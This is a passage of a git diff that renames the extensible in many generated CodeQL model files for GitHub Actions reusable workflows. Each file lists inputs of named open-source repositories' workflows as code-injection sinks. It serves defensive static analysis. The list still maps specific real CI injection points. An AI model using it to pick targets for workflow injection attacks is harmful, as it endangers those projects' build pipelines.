b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml index 8cc08edff5d..7463396b152 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml index c2963eb76f4..4c52a10d4f1 100644 --- a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml index 66aea90b41a..a6c5a8b8e3b 100644 --- a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml index 49ed7bca899..286e75fc9e2 100644 --- a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.IMAGE_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml index fd0a2d9110a..9ea5a9a34c7 100644 --- a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml index 1a3bdd1b380..34e41e9c589 100644 --- a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.last_commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml index 6185f9d03d0..cc38156973b 100644 --- a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.origin-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml index 273bbc69540..748287e75f8 100644 --- a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml index 3aac3af3cae..703a138d28d 100644 --- a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.test-package-base-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml index 9887b8e5f3a..97f1bafd1f3 100644 --- a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml index 4c6379fd94b..064c946363f 100644 --- a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml index 35738fe6c0f..4a5c66bc744 100644 --- a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.image_subpath", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml index 77db768cf32..a1e4b624b45 100644 --- a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.circt", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml index 509de954646..888aed947da 100644 --- a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.run_command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml index 6e0e2865e83..3b5f69e9342 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml index 69667ce10b1..8e28b46f2c7 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml index 175012c10c9..7f63b48ed84 100644 --- a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_nosim", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml index 84a834d9a1f..e7e42031e04 100644 --- a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.php-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml index 2946a78cf83..0c34609ccef 100644 --- a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.buildcmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml index 7ce68d84ca5..82de946e406 100644 --- a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-upgrade-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml index 8e3b9ccc0f8..09c4c2a83c3 100644 --- a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.image_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml index f41e2ee1246..0e4571fc728 100644 --- a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "input.url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml index c643a6a9fe0..6a03acfb11d 100644 --- a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.build-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml index 9aad213b1df..f41ee1211d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.tag_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml index 1906ef45379..8a64c0ce5f1 100644 --- a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.dev-engine", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml index f5ce50243f7..18e66bf7291 100644 --- a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.envname", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml index 58c30f3cd02..1ed7561a533 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml index d6c0ced50a6..738fde2cb86 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml index fdcb8775dad..c61a63f1144 100644 --- a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.source_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml index 66889d2cf42..fef036f4f29 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml index e5c5cfeabd3..b13ba8bc40f 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml index 4dc3fc2bc98..3fb2fefff6b 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml index 52c4b4c7a24..4344e254be0 100644 --- a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml index 038f92a5317..2a7c5feafea 100644 --- a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml index 6fab83acf59..9ccb41c3a8c 100644 --- a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml index 238856cc7b9..b71e6c001d0 100644 --- a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.test-script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml index 71b584f5427..ff0695c0ef2 100644 --- a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.append-date-and-hash", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml index 1aa15482887..9576ce3892a 100644 --- a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml index 89dd705f590..b78d6118411 100644 --- a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml index eb57c708bf5..cbe56806056 100644 --- a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.SUDO", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml index 048a753c553..391bbc6aacb 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml index 739f6a546b2..f8b490726da 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml index f6c2769caaf..889499eea3d 100644 --- a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 4d104c74c66..2dce19050ed 100644 --- 